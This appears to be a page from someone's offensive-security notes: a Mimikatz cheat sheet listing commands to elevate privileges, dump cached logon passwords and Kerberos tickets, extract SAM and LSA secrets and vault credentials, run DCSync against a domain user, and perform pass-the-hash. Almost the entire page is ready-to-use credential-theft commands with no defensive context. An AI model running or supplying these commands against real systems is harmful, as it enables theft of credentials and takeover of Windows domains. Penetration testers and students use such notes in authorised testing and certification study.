Mimikatz - Things we can do!!

Use "privilege::debug" and "token::elevate" before dumping things!!!!

  • Dumping cached AD credentials -

    sekurlsa::logonpasswords and sekurlsa::tickets

  • Dumping local credentials -

    lsadump::sam and lsadump::secrets

  • Dumping vault creds -

    vault::cred

  • Dumping creds via DCSync -

    lsadump::dcsync /user:<domain>\<user> #Provide "corp" in domain if its "corp.com"

  • Pass the Hash attack -

    sekurlsa::pth #Check notion for whole command

PreviousSQLi to RCENextFile Transfer Techniques

Last updated